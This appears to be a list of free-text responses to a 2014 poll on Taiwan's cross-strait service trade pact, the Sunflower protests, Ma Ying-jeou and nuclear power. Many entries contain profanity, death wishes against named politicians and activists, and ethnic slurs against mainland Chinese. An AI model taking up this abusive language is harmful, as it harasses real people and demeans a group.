<br><br>服貿過不過,其實對於已經有錢的人都不重要了,重要的事還沒有開始有錢的人,往後你們要陪養什麼能力才會晉升有錢一族,開放是為了更好,負面思考的人開不開放都不會有未來
<br><br>服貿過不過無所謂。 凡是都有一體兩面 過與不過都有好有壞。 重點是法的通過須符合程序正義及逐條審查
<br><br>服貿過了,台灣經濟才會更上一層!
<br><br>服貿過了人民等於死了
<br><br>服貿過了全國死
<br><br>服貿過了台灣死的更慘
<br><br>服貿過了?經濟會更好?大家才有飯吃!
<br><br>服貿過才能跟世界接軌、服貿是對大陸簽訂的一個跳板、一但簽訂才可跟各國家出口零關稅條約及美國TTP簽訂條件、就台灣而言提高競爭力、且帶動就業率!
<br><br>服貿過才能讓台灣人走出全世界,不要讓少數的台獨分子矇騙大家,欺騙一些善良的學生,利用善良老實的學生出來抗議服貿,導致讓台灣經濟無法進步,希望學生們能有多一點時間分析服貿的內容還有好處,自然就不會再聽信反服貿的一些少數暴民,讓台灣全民能有更多機會與全世界競爭。
<br><br>服貿過台灣才有未來
<br><br>服貿過台灣才能更有競爭力
<br><br>服貿過台灣有危害
<br><br>服貿過台灣各行業各機關及台灣主權將落入大陸手中
<br><br>服貿過台灣就沒有未來,而是大陸的未來,不想與阿六仔一起生活在沒水準的台灣。
<br><br>服貿過社會才有競爭力!受夠了台灣藍綠政客,有時想想如果統一也許對大家都好!
<br><br>服貿過是一定的!跟世界接軌是必需的!服貿過經濟才有救,失業率才會降!叫林飛帆去吃屎吧!自以為是神,沒出過社會賺錢的人才不懂什麼叫現實!馬的只會讓社會動盪不安搞壞社會安寧!麻煩檢調可以加速審查快點定案把自以為是神的林飛帆抓去關嗎!
<br><br>服貿過除可降稅競爭更可提昇國內服務品質,只有不肯上進,自卑的人才怕競爭、井底蛙跳不出井,叫聲很大,肚皮股漲,不能代表有骨氣、勇敢、肯拼的在井外努力不出聲、無暇閒耗的台灣人
<br><br>服貿過對台灣好
<br><br>服貿過雖艱困但還有生機,服貿死,台灣一定跟國外接軌不上,向下沈淪
<br><br>服貿過穩死
<br><br>服貿過
<br><br>服貿過 繁榮緩漲
<br><br>服貿賣台
<br><br>服貿應通過。台灣不能閉鎖。
<br><br>服貿應該要過、但是不相信馬先生、他好像什麼都搞不好、希望他提早下台、換個人來救台灣吧
<br><br>服貿應該過!
<br><br>服貿應該過
<br><br>服貿應過,要自由,民主,更要法治。
<br><br>服貿應過,提升競爭力
<br><br>服貿還是有些地方需改進,讓臺灣不會那麼吃虧。而現在許多國家都是靠中國來賺錢,如果不與中國簽訂服貿只是把自己鎖起來而已,把臺灣與世界的貿易體系隔絕。臺灣已經沒什麼邦交國了,且很多國家皆不承認臺灣,如果不簽定服貿將會是死路一條。今天我們不要服貿,韓國還搶著要呢!
<br><br>服貿
<br><br>服貿 如果不通過 台灣怎跟人競爭?
<br><br>服貿 核四 反核 都是建立在反馬的本質上。一位無法建立有效溝通的總統並不是在政策方向上有問題,而是缺乏心胸以及領導方法造成整體的不信任與混亂。在現在的社會氛圍下,如果因?缺乏領導能力而犧牲國家核心政策,那這樣的總統在歷史上應該是個自私的罪人。我個人支持馬總統多項的政策方向,包括處理王金平,服貿,核能,也深愛臺灣。但用錯方法非但無法取得全民朝野共識並推動迫切所需的政策改革,反而迫使國家倒退走。希望馬總統認真考慮以一個民主國家負責任領導者 做臺灣第一個辭職下臺的總統。
<br><br>服貿 過 就是台灣死
<br><br>服貿''死'',台灣原地踏步甚至可能退後,服貿''過'',台灣將俱備前瞻性。年輕的學子若俱備自信,何來的擔憂外來勢力? 共勉 ~
<br><br>服貿?台灣
<br><br>服?是好的?台?。
<br><br>林飛帆那配甚麼學運之神,明明就是民進黨的卒子,到年底選舉之前都會來亂的。
<br><br>林飛帆那種狗就去死啦!
<br><br>林飛帆看久了,您會煩很久!
<br><br>林飛煩,最好沒有政治操作!
<br><br>泛綠民眾有病嗎?
<br><br>哈!這樣的結果出來,看林飛煩,陳為停那幾個自稱代表多數的紅衛兵無言了吧!還沈醉在第一場上街頭的美化數字上,怎麼不再辦第二場,第三場?啊,你自己也沒把握再賭了吧,可憐又可笑的台籍紅衛兵
<br><br>哈哈大笑
<br><br>怎麼不求證一下?
<br><br>怎麼比例都沒變
<br><br>拜託!讓國家恢復正常,愛數的人去選擇他們要的,我沒有欠他。
<br><br>拜託那幾個學運學生,有LP一點,不要被抓就說不是我,也別在搞對立
<br><br>侵入公署,破壞公物,癱瘓議會,跨越拒馬,包圍警局,精神霸凌人民保姆,非法佔領忠孝西
<br><br>勇敢的台灣人
<br><br>保障本國人民的工作權
<br><br>保護政策只會讓國家窮途沒路,
<br><br>促進經濟
<br><br>俗話說伸頭是一刀,縮頭也是一刀,大勢已定讞。你再頑強抵抗,只有死的更難看,接受更多的凌遲;台灣長久以來一直依賴著老美在苟安,一點尊嚴也沒有,只能做個應聲蟲。如今換人做做看吧!看老中的臉色過活,趕緊簽下賣身契,或許可以掙到一個比較好的待遇。
<br><br>俄軍又入侵了嗎?可怕
<br><br>活?
<br><br>為什麼不公開而要選擇隱藏就是有不可告訴別人之?
<br><br>為什麼一定要中共我們才有未來,相信年輕人一定會青出於藍更勝於藍。
<br><br>為什麼用殘體字?
<br><br>為什麼如此大力宣傳服貿的弊端,過的票數還多過死的票數?那318學運豈不是白忙一場?
<br><br>為什麼服貿不過就是死,哪來的數據,危言聳聽的選項,究竟是什麼心態
<br><br>為什麼是簡體字 "發送"
<br><br>為什麼您會有我們的電話號碼
<br><br>為了下一代,別再封閉自己、大家加油,可以更謹慎條款別拒絕
<br><br>為了未來,服貿必定要過
<br><br>為了台灣的將來,服貿必須過!
<br><br>為了我們 和下一代能過得更好,
<br><br>為了更有競爭力現在必須有所犧牲。
<br><br>為了提昇台灣跟國際經濟競爭力服貿應該通過
<br><br>為了進入世界的市場
<br><br>為全國人發展更大的就業巿?!
<br><br>為何沒第三種選擇
<br><br>為因應此修正案,中華民國幼兒教育改革研究會則發起連署反對通過此案,其主張此提案若通過,將致使我國的學前教育領域從教育專業淪落成為教保勞力市場,同時嚴重損害合格教師之工作權益,反對多年來不易建立的高品質幼教專業向下沉淪。但此連署案卻也引起同為幼教從業人員的幼教師與教保員之間的齟齬,各自對於此提案有不同看法。
<br><br>為後代?還是為我們這一代以及我們
<br><br>為政者不能置人民水火於不顧,偽善是最卑劣,有智慧的人民一定要看清馬的假面具
<br><br>為時己?。天佑台灣。
<br><br>相信政府,支持統一,完成大中國願望!
<br><br>相關應應的法規如果有設立、修改服貿相關條約,服貿就有機會可以讓全台人民心服口服的通過了。
<br><br>看世界的眼光走進世界
<br><br>看事辦事!哎~
<br><br>看到那一群佔領立法院,在裡面慷慨激昂,自我感動落淚學生,覺得既可笑又可悲。可笑的是,
<br><br>看看香港現況,不想跟香港人民一樣可悲
<br><br>看新聞就知道是民進黨搞鬼
<br><br>盼進步與和諧,勿為反對而盲目的反對!
<br><br>美國,歐洲,國際性的發展,中國大陸也是國際,為何中國大陸就不行,全世界都要去大陸賺錢,台灣為何不可以?
<br><br>美國這位大哥現在也都靠中國賺錢,臺灣還在這邊拒絕中國?到底是想讓台灣變更好還是讓臺灣變更爛阿?
<br><br>政府已死,上街當道...
<br><br>政府也沒有長期方針
<br><br>政府也須要做好配套措施。
<br><br>政府沒有保護台人民的利益
<br><br>政府的責任應該告知我們所有決定的處置經過、不可以黑箱作業!
<br><br>政府施政多思慮,做正面的事,比較會得到支持,光明正大是根本,如果不光明正大,那什麼方法最終都不會成功。
<br><br>政府推動服貿不民主,服貿會葬送台灣的經濟和產業,台灣人將失業更嚴重。
<br><br>政府需要改變
<br><br>政治人物的市場只在臺灣島,應當苦民所苦,切勿因反而反。
<br><br>政治只有黑色
<br><br>政客都太會算計
<br><br>政經穩定成長才能繁榮,生存
<br><br>政黨的惡鬥,不該拿國家人民權益當賭注
<br><br>政黨繼續鬥爭臺灣沒救了大家移民吧!政客自己住
<br><br>既然有些人相要亂,那就亂個澈底,國家於大亂之後,方有大治,讓那些政治小丑現身吧。
<br><br>既然當政就尊重執政者,吵什麼吵。阿扁當年?不是我行我素,有聽、有鳥、有回應紅衫軍的訴求嗎?一群政客搞亂行政體制,曾經執政的民進黨就作的好嗎?貪污、舞弊、更不理會民意,如今有資格說別人執政如何嗎?下次總統投你民進黨,就看你有多大的能力!
<br><br>是伏冒?
<br><br>是非對錯,我們將一起承擔
<br><br>是政府的貪婪、黑暗讓民眾反對服貿!為什麼就不能說清楚講明白?
<br><br>是誰用何方式強逼人展開公投 噁心死了
<br><br>是
<br><br>是??
<br><br>染我們的生活圈,我以為我得不得癌症不重要,我們下一代會更慘,不是嗎?
<br><br>洗洗睡
<br><br>面對世界的現實
<br><br>面對國際局勢,服貿未過,大家未來一定有苦日子過o
<br><br>值得
<br><br>們不怕抗爭,確害怕競爭?
<br><br>個人言論自由那是代表個人,但不要口口聲聲?代表人民發言,並未每一名老百姓讓他們代表發言,別太自以為是了。
<br><br>唉,
<br><br>唉臺灣沒救了
<br><br>唉...
<br><br>要不要一天辦一場來玩玩啊
<br><br>要反壟斷,卻又想壟斷媒體,
<br><br>要力爭上游
<br><br>要民主!要守法!要安定!
<br><br>要以國家的未來以及大局為重,不要讓某些政治家為了單純的政治目的來操控學生操控國家,某些政黨請你們不要再拿國家的未來換取一己私心了好嗎?操控學生遊行,絕食抗議並說餓死就是被執政黨殺害,很可笑知道嗎?不要再做這麼幼稚的事情了,雖說服貿是維護了某部分人的權益,但是得益你們考慮過嗎?有得必有失,台灣加油
<br><br>要司法公正,又拜託法外開恩。
<br><br>要台獨建國,又不要子弟當兵,
<br><br>要台獨建國,又不要當兵服役。
<br><br>要台獨建國又不要當兵
<br><br>要有自信 不怕競爭
<br><br>要有好天氣、先調自身氣
<br><br>要有國際觀、不用刻意砥制任何一個國家!
<br><br>要有國際觀
<br><br>要有新願景
<br><br>要有競爭力的精神!
<br><br>要地區發展,又不要國光石化。
<br><br>要同等的過
<br><br>要安定
<br><br>要走上國際化
<br><br>要走出去路才會更?,才有生存空間
<br><br>要定訂好一點啊
<br><br>要服貿死的也就是想台灣死的,想台灣繼續鎖國、自己卻跟父母要錢、要享樂、卻不想進步、也沒有競爭力的一群白吃!
<br><br>要服貿過才有競爭力,不要短視。
<br><br>要勇於跨越
<br><br>要便宜用電,又不要核四發電。
<br><br>要便宜用電,又不要核能電廠,
<br><br>要便宜用電又不要核能
<br><br>要珍惜!要感恩!不要暴民!
<br><br>要相信自己的實力,要勇於面對挑戰。
<br><br>要是人民不知道的狀況下,
<br><br>要馬兒肥又要馬兒不吃草,可能嗎?
<br><br>要高薪工作,又不要建設工廠。
<br><br>要深思熟濾修改才能過
<br><br>要通過服貿,國家才有希望,帆和庭都是民進黨的代言人,作為令人不齒!
<br><br>要通過
<br><br>要欺負警察,又要叫警察保護。
<br><br>要欺負警察,卻又叫警察保護,
<br><br>要買得起房,又不要都市更新,
<br><br>要買得起房,又不要都市更新。
<br><br>要買得起房又不要都市更新
<br><br>要開放、不要鎖國,別人還沒來亂、已經自己亂了,怎麼搞的下去!
<br><br>要開放
<br><br>要經過公平程序的過
<br><br>要經濟發展,又不要服貿協議,
<br><br>要經濟發展,又不要服貿協議。
<br><br>要經濟發展,又不要國光石化,
<br><br>要過,雖然我是老人,為了下一代,這是趨勢,台灣有什麼本錢,請政客拿出良心來,愛台灣不是讓台灣淹淹一息,真的在此求求大爺們,不要只為選票,而污衊了無知的百姓。
<br><br>要過才有未來加油
<br><br>要過才有未來
<br><br>要過才有競爭力
<br><br>要過先把立委減半,官把百姓搞慘了
<br><br>要過國家才有進步發展空間與興盛
<br><br>要過
<br><br>要與世界接軌
<br><br>要導正社會亂象。
<br><br>若不過台灣被國際邊緣化
<br><br>若不過服貿、企業外移!何來經濟可言!
<br><br>若沒過,國家力量及競爭力?加速衰退,並且台灣缺乏天然資源,再恢復經濟會是困難渺茫的憾事。1
<br><br>挺服貿也許 對一些小企業短暫有影響但對未來是可以改善我們的經濟是有幫助的並可提升就業。增加國際競爭力。
<br><br>時代在變與進步,不可鎖國,國家無本錢,凡事需嚐試,才會進步,路才會更廣,有危機才有轉機,才會更上層樓海闊天空。
<br><br>時間 台灣 大陸 比例
<br><br>核一二三廠所?的?全民都在用 核四花了上千億元 ?道就像?到海
<br><br>核四不過,電價上漲,產業尋求低成本,外移是唯一的路,臺灣人失業是不能改變的,服貿不過,有能力的大型服務業也早外移了,讓大路服務業進臺灣提昇就業率、否則臺灣人失業也是必然的,如果為來五年台灣有4%的青年就業人口要自殺了,我還有機會要去看20年後的環境嘛
<br><br>核四停工,服貿更相對重要!
<br><br>核四
<br><br>核災還沒滅了台灣!台灣先被學運消滅了!
<br><br>浪費時間浪費錢做這種發出來會被打臉的民調幹嘛
<br><br>消極封閉永遠不是解決問題的手段。
<br><br>消滅共匪
<br><br>島嶼國家不能固步自封!
<br><br>師
<br><br>害怕競爭就是懦弱,我們有良好的底子,有啥好怕的,抗拒外部競爭,難道就沒有自己內部競爭了嗎?
<br><br>站在中國立場上看服貿不就什麼都清楚了,那些拼了命替服貿背書的,已經不知道拿中國多少的利益,台灣出一個馬英九下一次就是連勝文不信等著看
<br><br>耗掉的時間只會延緩發展,
<br><br>留下一群智障去堵警句
<br><br>留下台灣的競爭力與未來!什麼都不做不簽不推動,有如坐以待斃,坐吃山空!雖然簽不一定都會好,但我認為一線生機好過沒有,而且以我們台灣人的豪氣與智慧,會怕嗎?會輸嗎?我們應面對大陸的競爭大聲表示放馬過來!並迎回我們這世代的光榮與尊嚴!各位年輕的同輩們你們怕了嗎?我不怕!
<br><br>留言
<br><br>真港的台灣人是不怕競爭的,有一些人嘴巴說愛台灣蠱惑民眾.製造社會紛爭與動?,實為個人的知名度與政治後勢鋪路,其實是真正在傷害台灣的人,便是這些嘴說愛台灣的人
<br><br>破福懋
<br><br>除非拒絕資?主義全球化WTO 不然就得簽署?務貿易拹定
<br><br>馬卡茸你是頭殼壞掉了!怎麼不跟美、英、曰簽服貿
<br><br>馬政府太軟弱
<br><br>馬英九。mother fuck
<br><br>馬英九一家人沒有一個是純中華民國的人民!
<br><br>馬英九下台世界就和平
<br><br>馬英九死
<br><br>馬英九要死要活?
<br><br>馬英九賣國賊
<br><br>馬英九 幹你娘
<br><br>馬英久下台,釋放陳水扁,拯救林義雄
<br><br>馬陰酒去屎?爽
<br><br>馬總統不該亂加入服貿
<br><br>鬼島可以正常點嘛?
<br><br>停止所有具政治色彩的鬥爭
<br><br>假民調?
<br><br>假如台灣每日有這些吃飽人喳,不久台灣將如菲律賓、泰國等台灣會玩完,大學生應回復入伍當兵,超體能訓練,或政府或企業多辦大型動,學校應加重考試、作業、辯論會:?劇等比賽,不到學上課記曠課,教授們解聘,這都是教育部該做,但中央要決對的支持(要有些些作為)有種。我們支持唐湘龍,及東海大學女校長,但不必道歉。馬總統我們支持您,與民進黨蘇之面對應非常好,加油謝謝。
<br><br>假學運,假民主!沈默的大家,站出來表達真正的民意!
<br><br>假學運真共產
<br><br>做人要有遠見
<br><br>做的好,不要讓少數人的意見代表全部民意
<br><br>做該做的事
<br><br>參與服貿更有競爭力
<br><br>參与國際社會經濟体是任何一個國家所期待的。難道我們要跟朝鮮一樣,鎖國?
<br><br>啊你不是以為自己很厲害嗎?
<br><br>問題出在哪兒?才是我們的重要課題?既然我們不承認輸給中國,那台灣到底有什麼?值得大家認真努力的去思考。
<br><br>問題有點不?。「過」也可能被理解為錯誤。如果這樣,投票的結果就模糊了。
<br><br>問題問的很爛 不要玩文字遊戲
<br><br>唯有打破政治思考,才能走向光明的未來
<br><br>唯有加入服貿台灣才有競爭力。
<br><br>唯有自保
<br><br>唯有恐懼是立即呈現
<br><br>國之將亡,必有妖孽
<br><br>國家,國在前,家在后;沒有國,那有家。
<br><br>國家,國在前;家在后。沒有國,那有家。我們認同『中華民國』
<br><br>國家利益至上,一起努力
<br><br>國家興衰 人人有責
<br><br>國際化效果
<br><br>國際自由貿易,不用刻意封鎖任何一個國家!
<br><br>國際社會越來越多聯盟
<br><br>國際貿易本來就是互惠互利,在臺灣社會上有一群唯恐天下不亂的井底之蛙,缺乏遠見又見不得別人好的自我膨脹的人。沒本事怕改變怕外人來搶工作又不上進只會盲從莽撞反正又不必納稅只要抗議就有便當吃被洗齶腦了又不自覺只會怪政府;也不想想對社會貢獻了什麼。答案是破壞。沒用的臺大人清大人不屑!價值觀整個被扭曲。可悲!
<br><br>國際競爭不能等,走出去才有前途
<br><br>堅決反對多數服從少數的變質民主。
<br><br>執政黨顧意攪亂臺灣 製造對立 我支持太陽花 加油
<br><br>逆天而行不得善終
<br><br>退回服貿重調審查
<br><br>退回服貿
<br><br>退回服貿 悍衛民主
<br><br>退回服貿 捍衛民主
<br><br>討厭動不動抗議或佔領哪裡反感
<br><br>財團有利,人民死活誰關心
<br><br>接受制裁。自己犯法,卻無賴的高喊警察打人,秋後算賬,不禁為這群價值觀偏離的年輕人擔
<br><br>接受挑戰!
<br><br>張霽
<br><br>強大自己
<br><br>專業問題,專家研討?定。不必公投,真是唉聲歎氣
<br><br>將服貿原始的條文明白的讓大眾清楚看到
<br><br>從學運開始要求就不斷的改變
<br><br>從雞排妹現身學運和包圍中正一分局後開使對學運反感!
<br><br>從GATT到WT0,從來就是經濟強權操弄下的國際貿易秩序,參加未必快活,不參加鐵定難於倖存!一味的逢中必反,對台灣反而不利。
<br><br>常出國的人都知道.確定有些國家已經不使用核能發電.可是替代能源成本高.當地的電費是台灣的三倍.如此高的電費你能接受嗎?我到是有個擇中的辦法.新蓋的核能電廠(只要通過安全檢查)讓它運轉(不要白白浪費人民的血汗錢),把老舊安全有疑慮的電廠關閉。即安全.又不缺電.又有較合理的電費。當然.如果有更好的方法.您可以提出來讓大家來討論.不要只會反反反或者鬧鬧鬧,甚或只是考量個人的政治前途.拿全民利益來當賭注。所以個人認為.全民都該看清楚事情的前因及後果.確認你願意接受那樣的結果(缺電.高電費.日子難過)你真的想過那種生活嗎?
<br><br>常常有人說既然大陸願以經濟統一不就是對臺釋出善意了嗎?但如果真是釋出善意應該撤除飛彈,且無論統獨應該尊重臺人意願,而不是在國際上打壓臺灣的地位且阻斷臺灣與他國簽合約的機會再來要求我們簽一份不能更改又強行通關的協定,已經2014年了,應當有成熟的社會觀念,中共強勢的作為勢必無法讓正常的文明人所接受。
<br><br>眼光要長遠不要被政客擺弄沒有服貿台灣經濟會垮台
<br><br>統一完成中國富強人民幸福
<br><br>終至無法跟上腳步,
<br><br>終於有跳脫胡鬧的簡訊
<br><br>莫讓義和團干擾國家經濟及社會秩序
<br><br>毫無程序可言
<br><br>爽
<br><br>現在不跟中國簽約,之後台灣在國際上能得到的一些資源也就會慢慢減少,畢竟中國在國際舞台上的影響力不會減少。
<br><br>現在不管服貿核四或其他的事 只要他們看不爽就要抗議 強烈建議全台各縣市所有工程我們也都去抗議 這樣不管藍綠議員立委都沒錢賺沒回扣拿
<br><br>現在世界是在走經濟戰爭,以前是用槍炮戰爭,用槍炮己不容易得成,科技的發達,發動戰爭會馬上被發現,因此有國家己在發動經濟戰,國家經濟越強大,?累計倍數成長,國家經濟越弱,會累計倍數衰退,最後會被消滅,科技的工業革命,就業機會大量減少,人類自然要消滅很多人,後產生平衡
<br><br>現在只有啃老族不須服貿,另一個是自己為是,還向父母申手要錢的學生,只要有?常識,不須知識的人都知道要服貿。
<br><br>現在台灣最?濟需要走向國際化,我們需要與大陸合作而不排斥,大陸不需要也不會統一台灣,大陸希望我們同是中華民族一起合作把中國狀大,大陸看到我們的學運和民主運動太民主了,他們也害怕了
<br><br>現在好了!
<br><br>現在好以後影響更大
<br><br>現在的服貿當然得改!應該要有利於中小企業和百姓!
<br><br>現在的服貿應該死,而我願意通過更好的新服貿,謝謝
<br><br>現在怎麼什麼都在怕
<br><br>現在這個不能過,相關法規訂定之後再討論
<br><br>現況的台灣 不知道未來會怎樣
<br><br>都什麼時代了( 對 和 錯 )還搞不清楚。
<br><br>都是?了財團、而設計的條款,
<br><br>都要死!給他過!共產黨會對台灣人民好一些!一個中國!國民黨不行!共?黨應該可以搞好!死馬當活馬醫!天丫!
<br><br>都還是白癡白癡的。職場的倫理制度,應對進退以及很多基本的東西都有待學習。兩岸服務貿
<br><br>陸資創造更多機會!
<br><br>陰莖
<br><br>最好錢多事少離家近,
<br><br>最後圖利財團一定發生
<br><br>軟弱的執政團隊不敢伸出美國鎮暴部隊般的鐵腕,他們任性的為所欲為,因為知道不會有危險,
<br><br>這不是國安問題的話,請問什麼才是國安議題?
<br><br>這不是學運
<br><br>這一切全是政治人物玩弄人民的手腕
<br><br>這一代的年輕人,你們真的不知道吃苦是什麼,就是給你們太民主了,民主重要,還是經濟重要,有民主沒錢賺有什麼用,還是想辦法賺外面的錢吧!不要在浪費什會資源了。
<br><br>這些所謂學運領袖 大多是x英文的子弟兵 操弄反馬的情緒 阻礙所有的政府施政 為的是增加百姓的痛苦而加諸?執政黨的不滿 造成下次選舉的優勢 完完全全不是為了百姓的生計考量 以x英文來說 完全是搖擺的性格在核電議題上就知道 行政院長任內還猛稱讚核四並提出通過預算追加案 現在另一個樣 見人說人話見鬼說鬼話 這樣的人能當領導人嗎???
<br><br>這研究題目設計的太爛,容易造成誤解!我反服貿
<br><br>這是什麼?親中政策?
<br><br>這是什麼鬼?
<br><br>這是什麼單位或個人在統計,有公信力嗎?
<br><br>這是未來進步的趨勢
<br><br>這是早死晚死的問題~好死不如歹活!!
<br><br>這是阿共要統一台灣的陰謀,絕對不能過
<br><br>這是國際化的年代
<br><br>這是國際趨勢 國與國的關係以不如以往
<br><br>這是最好的時代也是最壞的時代
<br><br>這是詐騙嗎
<br><br>這是趨勢,對國家經貿發展是正面的,是加分的。
<br><br>這個投票這樣子問就代表根本就沒有搞清楚學運的訴求,我投"死",因為我覺得這一版沒有經過法律審查的服貿不能通過。但是如果能夠通過正確的立法程序並完成審查,我絕對贊成通過。
<br><br>這個標出的沒水準。應該是過與不過。要死蘋果去死吧。
<br><br>這真實性高嗎?
<br><br>這問題本身很有問題,內如提到"服貿是過還是死",
<br><br>這幹嘛?
<br><br>這種民調太粗略了,二分法民調不能代表民意!
<br><br>這網址有問題嗎
<br><br>這樣才有競爭
<br><br>這樣的投票可信嗎?是否太草率?
<br><br>這應該會比自由時報的垃圾民調更讓人可信!我連自由時報的都沒收到!!
<br><br>這啥
<br><br>通過)。用死是不恰當的。
<br><br>通過服貿,加強監督!
<br><br>通過服貿 和 監督機制是兩件事
<br><br>通過服貿?台灣相?產業有助益。
<br><br>通過順應潮流
<br><br>通過對未來更好。
<br><br>通過對未來所有都,年輕人就業機會多。
<br><br>逐條審查
<br><br>造幾個「神」經病!
<br><br>許多中小企業都在等待服貿過,不然企業死光光!
<br><br>提升自己的競爭力才是重點!
<br><br>提升自身價值不怕被比下去
<br><br>提昇競爭力~叫草莓族回家吃自己
<br><br>換我們賺大陸人民幣
<br><br>智障大陸狗
<br><br>智障
<br><br>替那些為前途不安的年輕人想想吧!
<br><br>殘體字請消失
<br><br>媒體不要製造對立
<br><br>就是反服貿 過了的話 我們7-8-9年級生一定要去當臺勞了 甚至 之後出生的小孩會更慘 所以我還是反服貿的
<br><br>就是要過
<br><br>就是得過,台灣跨出去?向前行!
<br><br>就這樣
<br><br>就讓它過吧~
<br><br>給我們一個機會和厲害的中國簽服貿,然後你不要?!
<br><br>給你給贊可以給我們不出聲的管道表達我們意見
<br><br>詞義
<br><br>無服貿台灣將自絕於世界
<br><br>無法想像往後自己要在死胡同度過
<br><br>無條件之支持政府的政策。讓台灣向前行
<br><br>無聊的命題
<br><br>無意見
<br><br>無意
<br><br>無論任何黨派取得執政權,首要的是促成經濟的繁榮,民生的富足與安樂!
<br><br>無論是民進黨或國民黨執政,國家政策一定要支持才能在穩定中求進步,貪腐官吏一律讓他們下台。
<br><br>無賴跟無能!
<br><br>無
<br><br>然而,細看這修正案的內容,雖表面稱為解決幼教師與教保員同工不同酬的困境,但是修正的部分也僅是刪除幼兒園大班需至少一位幼教師的限制,如此真能弭平幼教師與教保員同工不同酬的嫌隙嗎?這是長久以來許多問題未解決所埋下的地雷,政府若真認同教保員的專業能力,欲消除教保員與幼教師同工不同酬的問題,該是提升教保員的薪資待遇,而非僅是開放工作範圍。
<br><br>然後學運退場時自己現行離開
<br><br>發展自主經濟、這是道理!
<br><br>發這訊息的要先死
<br><br>硬要人民吃下去 我真的吞不下
<br><br>程式真陰!
<br><br>順便一提"反核電"
<br><br>順應大趨勢
<br><br>順應時代潮流,勇於接受世界競爭,針對部分爭議條款修正,實際監督機制確立,應該早日通過!
<br><br>黑箱決議並不能呈現真正的民意,請還給人民真正的民主價值。
<br><br>黑箱服貿滾
<br><br>黑箱就是死
<br><br>黑箱該死
<br><br>亂高
<br><br>亂糟糟這套民進黨專屬,國民黨學不會,因為民粹政治這招是向共產黨取經的,民進黨太像以前的中國共產黨了
<br><br>嗨
<br><br>嗨1
<br><br>詐騙
<br><br>貿易是自由平等的
<br><br>越慢出發,就永遠不會起步,
<br><br>開放二類電信根本賣國!太扯!
<br><br>開放也是死,不開放也是死,只是分早晚而已,即然都是死,那就選擇開放。
<br><br>開放才有錢途
<br><br>開放生、鎖國死!
<br><br>開放全球自由貿易,對外任何一個協議都非常珍貴,台灣人各項競爭力逐年退化,我們己無時間再內耗
<br><br>開放台灣才有未來
<br><br>開放走向經濟發展,創新經得起競爭,閉鎖只會日漸凋零滅亡。
<br><br>開放的政策是對的、嚴謹的監督是必須的,要對台灣有信心,讓我們攜手向前行!
<br><br>開放服貿是一個世界的驅勢,台灣不能離開這個貿易整合的潮流!愈是偏移潮流,愈是鎖國自封!
<br><br>開放是好事,但是應變措施不能少
<br><br>開放是活路,鎖國是死巷
<br><br>開放是唯一的路
<br><br>滅絕
<br><br>當大陸實際覺醒時,台灣早已邊緣化。
<br><br>當林飛帆陳?廷的子女?發?反服?反核四逢中必反的?果是使得台?百物飛?只有靠大陸?光客才能生存,那是多么大的悲哀和反諷啊!
<br><br>當個地球人吧!
<br><br>當然好要過 一條一條審
<br><br>當然是不?讓服貿過阿,除非是與別國簽訂,而不是中國!
<br><br>當然要過
<br><br>當然過不能夠為了一些無名而破壞台灣經濟。
<br><br>搞不懂喔~
<br><br>幹尼娘
<br><br>幹你娘的KMT別亂傳簡訊
<br><br>幹幹幹
<br><br>幹恁娘!我家12票!
<br><br>幹
<br><br>幹426殘體字
<br><br>意識型態的口水之爭,只會讓台灣越走越窄,經濟越益衰退,實為全民之災。
<br><br>想要高薪,又要企業受限,合乎邏輯嗎?
<br><br>愛台灣,全世界的人,認識台灣,台灣發揚光大
<br><br>愛台灣就不要禁錮台灣讓台灣與國際接?創造經濟富裕台灣
<br><br>該怎麼做.....就怎麼做!
<br><br>該過否則物價祇會越來越高
<br><br>資訊不夠透明
<br><br>資源方享~世界觀~服貿過
<br><br>跟本不需畏懼中共,以台灣民主進行的現實作為後盾,對大陸的影響及衝?將更具全面性!毋恃敵之不來,恃吾有以待之也!
<br><br>路剝奪其他市民行的權利都是不對的。敢做敢當,敢破壞公物就要負責賠償,敢違反法律就要
<br><br>經過中國走入世界
<br><br>經濟才會更好
<br><br>經濟必須要有自主性!看看現在落後國家就很明顯!
<br><br>經濟好起來大家有飯吃比較重要吧
<br><br>經濟走出去,台灣才有未來。
<br><br>經濟流通較活絡
<br><br>經濟要大於自由,沒錢哪來自由?
<br><br>經濟要走出去
<br><br>經濟要發展
<br><br>經濟
<br><br>聖經預言末世時地底之火將竄出席捲全世界。地獄之火指的大概是煤炭、石遊、天然氣、油頁岩、冰火等石化燃料。 試想這些原本?藏在在地下的碳化物,變成空氣中的二氧化碳。幾乎很難再放回地底。也沒有那麼多的森林來將它轉化成氧氣。
<br><br>圖形也未變
<br><br>實力、能力是競爭出來的,
<br><br>對未來台灣的經濟有很好的發展!
<br><br>對全民有利大家要支持
<br><br>對我來說這問題沒有很深入的問到這次學運的問題,餐與學運的很多人事支持服貿的,但卻又反對政府版本的服貿,你說這樣是問題中的「過」還是「死」?
<br><br>對於政治人物的偏見,並不會影響我對於政策的支持,儘管服貿議案內容有諸多爭議,但其基本精神我還是支持的
<br><br>對等關係,不能只有我們好,也要考慮別人,台灣要生存就不能自識過高,那只會封閉自己。
<br><br>對
<br><br>遊戲規則是要跟尊守規矩的人來玩!否則過什麼都是一樣。
<br><br>遇
<br><br>過,大家好
<br><br>過,只要能有競爭力都是好事
<br><br>過!但是要先立兩岸監督條例才能過!
<br><br>過!
<br><br>過不下去
<br><br>過不過只是遲早的事,除非有比過更好的配套措施。總統的智慧=國家的未來
<br><br>過了~經濟才過的了,太多短視近利,唯有跳出框架才能大部向前
<br><br>過了。 大家就沒有飯吃
<br><br>過了才不死,不過人人16K 過日子。
<br><br>過了才有未來!
<br><br>過了台灣就沒救了
<br><br>過了台灣經濟、政治才
<br><br>過了有55k,臺灣人別在畫地自限了!!
<br><br>過了對大環境比較好。
<br><br>過了臺灣就完了
<br><br>過也是死,不過也是死,只是分早過晚過,既然都是死,我選擇過
<br><br>過才能活
<br><br>過去幾年間,馬政府做為這個國家的掌權者展現出最惡劣的一面:在面對各種重大社會爭議時,一昧專斷獨行、罔顧民意、違法亂紀。不論是虛構台灣沒有服貿協定就無法生存的謊言,再以不合程序的方式企圖強渡關山;或者是謊稱核四不蓋就會有缺電危機,更在罔顧核安問題重重的狀況下,意圖強行插入燃料棒,這些事實都一再顯示馬政府的政策思維忽視人民意願,只顧及政商利益。這樣惡質的政府迫使人民一次又一次地走上街頭,用更激烈的手段來逼使政府正視人民的聲音。
<br><br>過台灣的經濟才好起來
<br><br>過屁咧
<br><br>過吧!
<br><br>過你個頭
